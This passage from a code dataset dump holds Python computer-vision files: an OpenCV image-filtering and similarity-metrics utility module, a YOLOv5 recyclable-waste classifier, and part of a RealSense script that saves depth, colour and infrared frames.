sigmaX=sigmaX) \r\n\r\n    # Save it to disk\r\n    cv.imwrite(out_file, result)\r\n\r\ndef cannyFilter(in_file: str, out_file: str, low_thres: int = 100, up_thres: int = 175):\r\n    \"\"\"This function applies a Canny filter to a grayscale image. The resulting image is then saved to disk\r\n    low_thres is the lower threshold (gray value)\r\n    up_thres is the upper threshold (gray value)\r\n    \"\"\"\r\n    # Reading the input image\r\n    original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n    if original is None: # If image wasn't read, then the file doesn't exist\r\n        raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n\r\n    # Applying Canny filter \r\n    result = cv.Canny(original, low_thres, up_thres) \r\n\r\n    # Save it to disk\r\n    cv.imwrite(out_file, result)\r\n\r\ndef laplaceFilter(in_file: str, out_file: str, size: int = 3):\r\n    \"\"\"This function applies a Laplacian filter to a grayscale image. The resulting image is then saved to disk\"\"\"\r\n    # Reading the input image\r\n    original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n    if original is None: # If image wasn't read, then the file doesn't exist\r\n        raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n\r\n    # Applying Laplacian filter \r\n    result = cv.Laplacian(original, ddepth=-1, ksize=size) # ddepth = -1 makes no changes to original color depth\r\n\r\n    # Save it to disk\r\n    cv.imwrite(out_file, result)\r\n\r\ndef bilateralFilter(in_file: str, out_file: str, size: int = 3, sigma: float = 250):\r\n    \"\"\"This function applies a bilateral filter to a grayscale image. The resulting image is then saved to disk\"\"\"\r\n    # Reading the input image\r\n    original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n    if original is None: # If image wasn't read, then the file doesn't exist\r\n        raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n\r\n    # Applying the filter\r\n    result = cv.bilateralFilter(original, d=size, sigmaColor=sigma, sigmaSpace=sigma)\r\n\r\n    # Save it to disk\r\n    cv.imwrite(out_file, result)\r\n\r\ndef motionBlurFilter(in_file: str, out_file: str):\r\n    \"\"\"This function applies a motion blur filter to a grayscale image. 
The resulting image is then saved to disk\"\"\"\r\n    # Reading the input image\r\n    original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n    if original is None: # If image wasn't read, then the file doesn't exist\r\n        raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n\r\n    filter = np.array([[0, 0, 0.32], [0.32, 0.33, 0.01], [0.01, 0, 0]])\r\n\r\n    # Applying the filter\r\n    # Second parameter = -1 : keeps the same colordepth\r\n    result = cv.filter2D(original, -1, filter)\r\n\r\n    # Save it to disk\r\n    cv.imwrite(out_file, result)\r\n\r\ndef sharpenFilter(in_file: str, out_file: str):\r\n    \"\"\"This function applies a sharpening filter to a grayscale image. The resulting image is then saved to disk\"\"\"\r\n    # Reading the input image\r\n    original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n    if original is None: # If image wasn't read, then the file doesn't exist\r\n        raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n\r\n    filter = np.array([[0, -1, 0], [-1, 5, -1], [0, -1, 0]])\r\n\r\n    # Applying the filter\r\n    # Second parameter = -1 : keeps the same colordepth\r\n    result = cv.filter2D(original, -1, filter)\r\n\r\n    # Save it to disk\r\n    cv.imwrite(out_file, result)\r\n\r\ndef embossFilter(in_file: str, out_file: str):\r\n    \"\"\"This function applies an emboss filter to a grayscale image. The resulting image is then saved to disk\"\"\"\r\n    # Reading the input image\r\n    original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n    if original is None: # If image wasn't read, then the file doesn't exist\r\n        raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n\r\n    filter = np.array([[-2, -1, 0], [-1, 1, -1], [0, 1, 2]])\r\n\r\n    # Applying the filter\r\n    # Second parameter = -1 : keeps the same colordepth\r\n    result = cv.filter2D(original, -1, filter, borderType=cv.BORDER_CONSTANT)\r\n\r\n    # Save it to disk\r\n    cv.imwrite(out_file, result)\r\n\r\ndef customFilter(in_file: str, out_file: str):\r\n    \"\"\"This function applies a filter (this behaves like a mixture of low and high pass) to a grayscale image. The resulting image is then saved to disk\"\"\"\r\n    # Reading the input image\r\n    original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n    if original is None: # If image wasn't read, then the file doesn't exist\r\n        raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n\r\n    # Creating the matrix filter (sizeXsize)\r\n    filter = np.array([[0.5, 0, -0.5], [0, 1, 0], [0.5, 0, -0.5]])\r\n\r\n    # Applying the filter\r\n    # Second parameter = -1 : keeps the same colordepth\r\n    result = cv.filter2D(original, -1, filter)\r\n\r\n    # Save it to disk\r\n    cv.imwrite(out_file, result)\r\n\r\ndef histogramEq(in_file: str, out_file: str):\r\n    \"\"\"This function equalizes the histogram of a grayscale image. The resulting image is then saved to disk\"\"\"\r\n    # Reading the input image\r\n    original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n    if original is None: # If image wasn't read, then the file doesn't exist\r\n        raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n\r\n    # Equalizing the histogram\r\n    result = cv.equalizeHist(original)\r\n\r\n    # Save it to disk\r\n    cv.imwrite(out_file, result)\r\n## End of image filters section\r\n\r\n## Start of image transformation section\r\ndef rotateImage(in_file: str, out_file: str, angle: float, in_img: cv.Mat = None) -> cv.Mat:\r\n    \"\"\"This function rotates an image by an angle. 
The resulting image is then saved to disk\r\n    If angle > 0 : rotation is clockwise, otherwise is counterclockwise\r\n    \"\"\"\r\n    if in_img is None:\r\n        original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n        if original is None: # If image wasn't read, then the file doesn't exist\r\n            raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n    else:\r\n        original = in_img\r\n    \r\n    # Generating the rotation matrix\r\n    (height, width) = original.shape\r\n    M = cv.getRotationMatrix2D((width/2, height/2), angle, 1) \r\n\r\n    # Applying the rotation\r\n    result = cv.warpAffine(original, M, (width, height), borderMode=cv.BORDER_REPLICATE) # This tuple goes backwards!\r\n\r\n    # Save it to disk\r\n    if out_file is not None:\r\n        cv.imwrite(out_file, result)\r\n    \r\n    return result\r\n\r\ndef scaleImage(in_file: str, out_file: str, scale_percent : float, in_img: cv.Mat = None) -> cv.Mat:\r\n    \"\"\"This function scales an image by scale_percent. The resulting image is then saved to disk\r\n    If scale_percent > 1 : image gets \"zoomed in\", otherwise \"zoomed out\"\r\n    \"\"\"\r\n    if in_img is None:\r\n        original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n        if original is None: # If image wasn't read, then the file doesn't exist\r\n            raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n    else:\r\n        original = in_img\r\n    \r\n    # Generating the scaling matrix (a rotation matrix with angle 0)\r\n    (height, width) = original.shape\r\n    M = cv.getRotationMatrix2D((width/2, height/2), 0, scale_percent) \r\n\r\n    # Applying the scaling\r\n    result = cv.warpAffine(original, M, (width, height), borderMode=cv.BORDER_REPLICATE) # This tuple goes backwards!\r\n\r\n    # Save it to disk\r\n    if out_file is not None:\r\n        cv.imwrite(out_file, result)\r\n    \r\n    return result\r\n\r\ndef translateImage(in_file: str, out_file: str, tx: int, ty: int, in_img: cv.Mat = None) -> cv.Mat:\r\n    \"\"\"This function translates an image by tx, ty. 
The resulting image is then saved to disk\r\n    \"\"\"\r\n    if in_img is None:\r\n        original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n        if original is None: # If image wasn't read, then the file doesn't exist\r\n            raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n    else:\r\n        original = in_img\r\n    \r\n    # Generating the translation matrix\r\n    (height, width) = original.shape\r\n    M = np.float32([[1, 0, tx], [0, 1, ty]])\r\n\r\n    # Applying the translation\r\n    result = cv.warpAffine(original, M, (width, height), borderMode=cv.BORDER_REPLICATE) # This tuple goes backwards!\r\n\r\n    # Save it to disk\r\n    if out_file is not None:\r\n        cv.imwrite(out_file, result)\r\n    \r\n    return result\r\n\r\ndef totalTransformation(in_file: str, out_file: str, angle: float, scale_factor: float, tx: int, ty: int):\r\n    \"\"\"This function applies all transformation functions to an image and saves it to disk\r\n    \"\"\"\r\n    original = cv.imread(in_file, cv.IMREAD_GRAYSCALE)\r\n\r\n    if original is None: # If image wasn't read, then the file doesn't exist\r\n        raise FileNotFoundError('Image \\'{0}\\' not found'.format(in_file))\r\n    \r\n    # Apply rotation\r\n    result = rotateImage(in_file = None, out_file=None, angle=angle, in_img=original)\r\n\r\n    # Apply scaling\r\n    result = scaleImage(in_file = None, out_file=None, scale_percent=scale_factor, in_img=result)\r\n\r\n    # Apply translation\r\n    result = translateImage(in_file = None, out_file=None, tx=tx, ty=ty, in_img=result)\r\n\r\n    # Save it to disk\r\n    cv.imwrite(out_file, result)\r\n\r\n## End of image transformation section\r\n\r\n## Start of subimage section\r\ndef getOriginalImgSubmatrices(in_img: cv.Mat, sub_size: int = 3) -> pd.DataFrame:\r\n    \"\"\"Return the original image sliced into sub_sizeXsub_size submatrices necessary for later processing.\r\n    sub_size must be an odd integer\r\n    \"\"\"\r\n    if sub_size % 2 == 0:\r\n        raise RuntimeError('The submatrix size must be odd')\r\n    \r\n    # Size of padding needed to be added\r\n    padding_size = int((sub_size - 1) / 2)\r\n    # List which will store the submatrices\r\n    sub_list = []\r\n\r\n    # To create the submatrices, the default OpenCV BorderType behavior will be replicated\r\n    # To do this, padding needs to be added to the image\r\n    # OpenCV BORDER_REFLECT_101 reflects the pixels in the following manner gfedcb|abcdefgh|gfedcba\r\n    padded_img = cv.copyMakeBorder(in_img, top=padding_size, bottom=padding_size, left=padding_size, right=padding_size, borderType=cv.BORDER_REFLECT_101)\r\n\r\n    # shape[0] is the image height, shape[1] is the image width\r\n    (height, width) = padded_img.shape\r\n\r\n    for i in range(0, height - sub_size + 1): # loop through rows \r\n        for j in range(0, width - sub_size + 1): # loop through columns\r\n            cur_sub = np.array(padded_img[i:i + sub_size, j:j + sub_size]) # current iteration submatrix\r\n            sub_list.append(np.reshape(cur_sub, newshape=(1, np.product((sub_size, sub_size))))[0])\r\n\r\n    return pd.DataFrame(np.array(sub_list, dtype=np.uint8))\r\n    \r\ndef getFilteredImgSubmatrices(in_img: cv.Mat) -> pd.DataFrame:\r\n    \"\"\"Return the filtered image resulting submatrix (actually just a pixel)\"\"\"\r\n    # shape[0] is the image height, shape[1] is the image width\r\n    (height, width) = in_img.shape\r\n    # List which will store the submatrices\r\n    sub_list = []\r\n\r\n    # For the filtered images, just the central pixel of the original submatrices is needed\r\n    # This means that only in_img[i, j] is needed\r\n    for i in range(0, height): # loop through rows\r\n        for j in range(0, width): # 
loop through columns\r\n            cur_sub = np.array([in_img[i, j]])\r\n            sub_list.append(cur_sub)\r\n\r\n    return pd.DataFrame(np.array(sub_list, dtype=np.uint8))\r\n## End of subimage section\r\n\r\n## Start of rebuild image section\r\ndef rebuildImages(pixels, height: int, width: int) -> list[cv.Mat]:\r\n    \"\"\"This function rebuilds a list of images\"\"\"\r\n    num_pixels = height * width\r\n    img_list = []\r\n\r\n    for i in range(0, len(pixels.values), num_pixels):\r\n        cur_pixels = pixels.values[i:(i+num_pixels)]\r\n        cur_img = rebuildSingleImage(cur_pixels, height, width)\r\n        img_list.append(cur_img)\r\n\r\n    return img_list\r\n\r\ndef rebuildSingleImage(pixels: np.array, height: int, width: int) -> cv.Mat:\r\n    \"\"\"This function rebuilds an image, heightXwidth in size with its pixels\"\"\"\r\n    cur_pixel = 0\r\n    rebuilt_img = np.zeros((height, width), dtype=np.uint8)\r\n\r\n    for i in range(0, height): # loop through rows \r\n        for j in range(0, width): # loop through columns\r\n            rebuilt_img[i, j] = pixels[cur_pixel]\r\n            cur_pixel += 1\r\n\r\n    return rebuilt_img\r\n\r\ndef predictionProcessing(pred: np.array) -> pd.DataFrame:\r\n    \"\"\"This function corrects any out of bound values for np.uint8 and returns the values as a DataFrame\"\"\"\r\n    # Checking for underflow and overflow\r\n    for i in range(0, len(pred)):\r\n        if (pred[i] < 0):\r\n            pred[i] = np.array([0])\r\n        elif (pred[i] > 255):\r\n            pred[i] = np.array([255])\r\n\r\n    # Converting the predictions into a DataFrame\r\n    return pd.DataFrame(pred).astype(np.uint8)\r\n## End of rebuild image section\r\n\r\n## Start of frequency domain section\r\ndef fourierTransform(img: cv.Mat, shifted: bool = True):\r\n    \"\"\"This function returns the 2D FFT of an image. If shifted is True, the zero frequency component will be brought to the center\"\"\"\r\n    f = np.fft.fft2(img)\r\n    if shifted:\r\n        f = np.fft.fftshift(f)\r\n    \r\n    # to avoid zero values, and negative values in the final result, every value below 1 is now 1\r\n    # a bit tacky, but...\r\n    f = np.abs(f)\r\n    f[f < 1] = 1 \r\n\r\n    return 20*np.log10(f)\r\n## End of frequency domain section\r\n\r\n## Start of image similarity measurement section\r\ndef getSSIM(ref: cv.Mat, test: cv.Mat) -> tuple[np.float64, cv.Mat]:\r\n    \"\"\"This function calculates the structural similarity index, which indicates how similar images ref and test are.\r\n    0 indicates totally dissimilar images\r\n    1 indicates identical images\r\n    It also returns a difference image\r\n    \"\"\"\r\n    (ssim, diff) = structural_similarity(ref, test, full=True)\r\n    \r\n    # diff is returned as a float array with values in the [0, 1] range\r\n    # Conversion to uint8 is needed to be able to show or save the image\r\n    diff = (diff * 255).astype(\"uint8\")\r\n\r\n    return (ssim, diff)\r\n\r\ndef getPSNR(ref: cv.Mat, test: cv.Mat) -> np.float64:\r\n    \"\"\"Calculates the peak signal to noise ratio of two images\r\n    Lower values (potentially negative) indicate dissimilarity\r\n    Higher values (potentially infinity) indicate similarity\r\n    \"\"\"\r\n    return peak_signal_noise_ratio(ref, test)\r\n\r\ndef getNMI(ref: cv.Mat, test: cv.Mat) -> np.float64:\r\n    \"\"\"Calculates the normalized mutual information of two images\r\n    1 indicates uncorrelated images\r\n    2 indicates correlated images\r\n    \"\"\"\r\n    nmi = normalized_mutual_information(ref, test)\r\n\r\n    # assuming that if the nmi is nan, the images can be totally correlated\r\n    return 2.0 if np.isnan(nmi) else nmi\r\n\r\ndef getMSE(ref: cv.Mat, test: cv.Mat) -> np.float64:\r\n    \"\"\"Calculates the mean squared 
error of two images\"\"\"\r\n    return mean_squared_error(ref, test)\r\n## End of image similarity measurement section\r\n\r\n# Show a message if the script is run by itself\r\nif __name__ == '__main__':\r\n    print(\"This script is not designed to be standalone.\")", "repo_name": "JosBarranquero/ML_filtered_images", "sub_path": "scripts_python/image_utils.py", "file_name": "image_utils.py", "file_ext": "py", "file_size_in_byte": 19994, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.imread", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 13, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.filter2D", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 39, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 39, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 45, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 46, "usage_type": "call"}, {"api_name": "cv2.filter2D", "line_number": 50, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 55, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 57, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 62, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 62, "usage_type": "attribute"}, {"api_name": "cv2.medianBlur", "line_number": 68, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 71, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 76, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 76, "usage_type": "attribute"}, {"api_name": "cv2.Sobel", "line_number": 82, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 85, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 90, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 90, "usage_type": "attribute"}, {"api_name": "cv2.Sobel", "line_number": 96, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 99, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 104, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 104, "usage_type": "attribute"}, {"api_name": "cv2.GaussianBlur", "line_number": 112, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 115, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 123, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 123, "usage_type": "attribute"}, {"api_name": "cv2.Canny", "line_number": 129, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 132, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 137, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 137, "usage_type": "attribute"}, {"api_name": "cv2.Laplacian", "line_number": 143, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 146, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 151, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 151, "usage_type": "attribute"}, {"api_name": "cv2.bilateralFilter", "line_number": 157, 
"usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 160, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 165, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 165, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 170, "usage_type": "call"}, {"api_name": "cv2.filter2D", "line_number": 174, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 177, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 182, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 182, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 187, "usage_type": "call"}, {"api_name": "cv2.filter2D", "line_number": 191, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 194, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 199, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 199, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 204, "usage_type": "call"}, {"api_name": "cv2.filter2D", "line_number": 208, "usage_type": "call"}, {"api_name": "cv2.BORDER_CONSTANT", "line_number": 208, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 211, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 216, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 216, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 222, "usage_type": "call"}, {"api_name": "cv2.filter2D", "line_number": 226, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 229, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 234, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 234, "usage_type": "attribute"}, {"api_name": "cv2.equalizeHist", "line_number": 240, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 243, "usage_type": "call"}, {"api_name": "cv2.Mat", "line_number": 247, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 252, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 252, "usage_type": "attribute"}, {"api_name": "cv2.getRotationMatrix2D", "line_number": 261, "usage_type": "call"}, {"api_name": "cv2.warpAffine", "line_number": 264, "usage_type": "call"}, {"api_name": "cv2.BORDER_REPLICATE", "line_number": 264, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 268, "usage_type": "call"}, {"api_name": "cv2.Mat", "line_number": 272, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 277, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 277, "usage_type": "attribute"}, {"api_name": "cv2.getRotationMatrix2D", "line_number": 286, "usage_type": "call"}, {"api_name": "cv2.warpAffine", "line_number": 289, "usage_type": "call"}, {"api_name": "cv2.BORDER_REPLICATE", "line_number": 289, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 293, "usage_type": "call"}, {"api_name": "cv2.Mat", "line_number": 297, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 301, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 301, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 310, "usage_type": "call"}, {"api_name": "cv2.warpAffine", "line_number": 313, "usage_type": "call"}, {"api_name": "cv2.BORDER_REPLICATE", "line_number": 313, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 317, 
"usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 324, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 324, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 339, "usage_type": "call"}, {"api_name": "cv2.Mat", "line_number": 344, "usage_type": "attribute"}, {"api_name": "cv2.copyMakeBorder", "line_number": 359, "usage_type": "call"}, {"api_name": "cv2.BORDER_REFLECT_101", "line_number": 359, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 366, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 367, "usage_type": "call"}, {"api_name": "numpy.product", "line_number": 367, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 369, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 369, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 369, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 344, "usage_type": "attribute"}, {"api_name": "cv2.Mat", "line_number": 371, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 382, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 385, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 385, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 385, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 371, "usage_type": "attribute"}, {"api_name": "cv2.Mat", "line_number": 389, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 401, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 404, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 404, "usage_type": "attribute"}, {"api_name": "cv2.Mat", "line_number": 401, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 413, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 418, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 420, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 423, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 423, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 413, "usage_type": "attribute"}, {"api_name": "cv2.Mat", "line_number": 427, "usage_type": "attribute"}, {"api_name": "numpy.fft.fft2", "line_number": 429, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 429, "usage_type": "attribute"}, {"api_name": "numpy.fft.fftshift", "line_number": 431, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 431, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 435, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 438, "usage_type": "call"}, {"api_name": "cv2.Mat", "line_number": 442, "usage_type": "attribute"}, {"api_name": "skimage.metrics.structural_similarity", "line_number": 448, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 442, "usage_type": "attribute"}, {"api_name": "cv2.Mat", "line_number": 456, "usage_type": "attribute"}, {"api_name": "skimage.metrics.peak_signal_noise_ratio", "line_number": 461, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 456, "usage_type": "attribute"}, {"api_name": "cv2.Mat", "line_number": 463, "usage_type": "attribute"}, {"api_name": "skimage.metrics.normalized_mutual_information", "line_number": 468, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 471, "usage_type": "call"}, {"api_name": 
"numpy.float64", "line_number": 463, "usage_type": "attribute"}, {"api_name": "cv2.Mat", "line_number": 473, "usage_type": "attribute"}, {"api_name": "skimage.metrics.mean_squared_error", "line_number": 475, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 473, "usage_type": "attribute"}]} +{"seq_id": "32054173099", "text": "import yolov5\nclass ImageProcessor:\n def __init__(self):\n self.model = yolov5.load('./best.pt')\n # set model parameters\n self.model.conf = 0.25 # NMS confidence threshold\n self.model.iou = 0.45 # NMS IoU threshold\n self.model.agnostic = False # NMS class-agnostic\n self.model.multi_label = False # NMS multiple labels per box\n self.model.max_det = 100 # maximum number of detections per image\n self.model.names = ['Compost (Biodegradable)',\n 'Recycle (cardboard)',\n 'Recycle (glass)',\n 'Recycle (metal)',\n 'Recycle (paper)',\n 'Recycle (plastic)']\n\n def process_image(self, img):\n\n # perform inference\n #results = model(img, size=640)\n\n # inference with test time augmentation\n results = self.model(img, size=640, augment=True)\n\n # parse results\n predictions = results.pred[0]\n boxes = predictions[:, :4] # x1, y1, x2, y2\n scores = predictions[:, 4]\n categories = predictions[:, 5]\n labels = ['biodegradable', 'cardboard', 'glass', 'metal', 'paper', 'plastic']\n\n print(labels[int(categories[0])])\n results.print()\n\n # show detection bounding boxes on image\n\n # save results into \"results/\" folder\n results.save(save_dir='results/')\n\n", "repo_name": "kofu145/BananaServer", "sub_path": "imageprocessor.py", "file_name": "imageprocessor.py", "file_ext": "py", "file_size_in_byte": 1414, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "yolov5.load", "line_number": 4, "usage_type": "call"}]} +{"seq_id": "428488789", "text": "# 原文链接:https://blog.csdn.net/github_29705847/article/details/102938736\nimport pyrealsense2 as rs\nimport numpy as np\nimport cv2\n\n\nclass realsense_im(object):\n def __init__(self, image_size=(640, 480)):\n self.pipeline = rs.pipeline()\n config = rs.config()\n config.enable_stream(\n rs.stream.depth, image_size[0], image_size[1], rs.format.z16, 30)\n config.enable_stream(\n rs.stream.color, image_size[0], image_size[1], rs.format.bgr8, 30)\n config.enable_stream(\n rs.stream.infrared, 1, image_size[0], image_size[1], rs.format.y8, 30)\n self.profile = self.pipeline.start(config)\n\n def __get_depth_scale(self):\n depth_sensor = self.profile.get_device().first_depth_sensor()\n\n depth_scale = depth_sensor.get_depth_scale()\n\n return depth_scale\n\n def get_image(self, with_ir=False):\n frames = self.pipeline.wait_for_frames()\n depth_frame = frames.get_depth_frame()\n color_frame = frames.get_color_frame()\n\n depth_image = np.asarray(depth_frame.get_data(), dtype=np.float32)\n color_image = np.asarray(color_frame.get_data(), dtype=np.uint8)\n color_image_pad = np.pad(\n color_image, ((20, 0), (0, 0), (0, 0)), \"edge\")\n depth_map_end = depth_image * self.__get_depth_scale() * 1000\n\n if with_ir:\n ir_frame = frames.get_infrared_frame(1)\n # ir_image = np.asarray(ir_frame.get_data(), dtype=np.float32)\n ir_image = np.asanyarray(ir_frame.get_data())\n return depth_map_end, color_image, ir_image\n else:\n return depth_map_end, color_image, None\n\n def process_end(self):\n self.pipeline.stop()\n\n\nrs_t = realsense_im()\n\ni = 0\ntry:\n while True:\n with_ir = True\n depth_map, rgb_map, ir_map = rs_t.get_image(with_ir=with_ir)\n 
save_file_img = './examples/savefig/rgb/image_r_{}.png'.format(\n str(i).zfill(5))\n cv2.imwrite(save_file_img, rgb_map)\n i += 1\n\n save_file_depth = './examples/savefig/depth/Tbimage_d_{}.png'.format(\n str(i).zfill(5))\n cv2.imwrite(save_file_depth, np.asarray(depth_map, np.uint16))\n print('save_file_img:', save_file_img,\n 'save_file_depth:', save_file_depth)\n if ir_map is not None:\n # im_show = np.hstack((depth_map, ir_map))\n im_show = ir_map\n else:\n im_show = depth_map\n\n cv2.namedWindow('RGB Example', cv2.WINDOW_AUTOSIZE)\n cv2.imshow('RGB and IR Example', im_show)\n key = cv2.waitKey(1)\n # Press esc or 'q' to close the image window\n if key & 0xFF == ord('q') or key == 27:\n cv2.destroyAllWindows()\n break\n\nfinally:\n rs_t.process_end()\n", "repo_name": "ViktorLiang/GW-Depth", "sub_path": "depth_interpolation/depth_img_save.py", "file_name": "depth_img_save.py", "file_ext": "py", "file_size_in_byte": 2800, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pyrealsense2.pipeline", "line_number": 9, "usage_type": "call"}, {"api_name": "pyrealsense2.config", "line_number": 10, "usage_type": "call"}, {"api_name": "pyrealsense2.stream", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pyrealsense2.format", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pyrealsense2.stream", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pyrealsense2.format", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pyrealsense2.stream", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pyrealsense2.format", "line_number": 16, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.float32", 